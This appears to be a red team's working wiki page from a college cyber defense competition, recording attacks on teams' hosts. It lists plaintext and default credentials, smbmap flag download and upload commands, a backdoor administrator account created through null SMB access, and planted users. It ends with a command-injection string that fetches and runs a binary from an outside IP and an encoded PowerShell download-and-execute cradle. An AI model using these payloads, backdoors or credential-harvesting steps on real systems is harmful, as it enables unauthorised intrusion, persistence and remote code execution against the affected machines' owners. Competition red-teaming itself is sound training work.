Red Wiki

Competition Information
Flag Locations
Team Wiki Pages

Team 1:    No Red Assignee

Team 2:    No Red Assignee

Team 3:    No Red Assignee

Team 4:    No Red Assignee

Team 5:    No Red Assignee

Team 7:    No Red Assignee

Team 8:    No Red Assignee

Team 9:    No Red Assignee

Team 11:    No Red Assignee

Team 12:    No Red Assignee

Team 13:    No Red Assignee

General Help and Information

DOWNLOAD: smbmap -H ad.team40.isucdc.com -u 'david.ward' -p 'vin938fec' --download "C$/Windows/System32/team11_ad-cwindowssystem32.flag"
UPLOAD: smbmap -H ad.team40.isucdc.com -u 'david.ward' -p 'keq414buz' --upload Downloads/2025-c3/team4/team4_ad-cusersadministrator.flag 'C$/Users/Administrator/team4_ad-cusersadministrator.flag'



Backdoor local admin user on LP for teams 1, 4, 6, 10, 11, 13
Username: adminsitrator
Password: Redteamuser123
Abused null SMB authentication, wrote a PowerShell script that creates a local user and adds it to the local Administrators group
NOTE: Team 1 and Team 4 appear to have removed access for the backdoor user, however, NULL auth to the Labels SMB share is still allowed
ALSO NOTE: Team 6 and 10 are not real

SHARED CREDS
sandra.henderson->ROCK123
darren.williams->blues22
allison.hamilton->tiny85
lori.petersen->ricale


john.leguizamo:lordoftheflame, cdc:cdc, root:cdc
OK   team=1   host=www.team1.isucdc.com          user=john.leguizamo  reason=ok
OK   team=4   host=wms.team4.isucdc.com          user=cdc       reason=ok
OK   team=4   host=www.team4.isucdc.com          user=root      reason=ok
OK   team=7   host=wms.team7.isucdc.com          user=cdc       reason=ok
OK   team=7   host=www.team7.isucdc.com          user=cdc       reason=ok
OK   team=11  host=wms.team11.isucdc.com         user=root      reason=ok
OK   team=13  host=wms.team13.isucdc.com         user=cdc       reason=ok
OK   team=13  host=www.team13.isucdc.com         user=cdc       reason=ok
OK   team=13  host=db.team13.isucdc.com          user=cdc       reason=ok


Default creds found for:
- Team1
  - lp.team1.isucdc.com, RDP && SMB, Administrator:cdc
- Team4
  - wms.team4.isucdc.com, SSH, cdc:cdc
  - db.team4.isucdc.com, SSH, richard:cdc
- Team7
  - www[.]team7.isucdc.com, SSH, cdc:cdc
  - wms.team7.isucdc.com, SSH, cdc:cdc
- Team12
  - db.team12.isucdc.com, SSH, richard:cdc
- Team13
  - ad.team13.isucdc.com, LDAP, Administrator:cdc
  - www[.]team13.isucdc.com, SSH, cdc:cdc
  - lp.team13.isucdc.com, RDP && SMB, Administrator:cdc
  - wms.team13.isucdc.com, SSH, cdc:cdc

New user on teams 4,7,13 for www, wms, and db - `killer-bob:whokilledlaurapalmer` or `killer.bob:WhoKilledLauraPalmer`, or `killerbob:whokilledlaurapalmer`.




mysql -u cdc -p'cdc' -h db.team9.isucdc.com

use iseage_db;
create table if not exists red ( id int AUTO_INCREMENT PRIMARY KEY, flag VARCHAR(50) NOT NULL);
insert into red (flag) values ('Lx56MVFytdT9dhiLpmc3T457vBwbMtDV2FTEUzxEQtSrGQDSWp');
select * from red;


asdf\"; wget http://12.110.206.199:443/t -O /tmp/a; chmod +x /tmp/a; /tmp/a; \"asdf

powershell -e aQByAG0AKAAnAGgAdAB0AHAAOgAvAC8AMQAyAC4AMQAxADAALgAyADIANgAuADEANgA2AC8AcgAuAHAAcwAxACcAKQB8AGkAZQB4AA==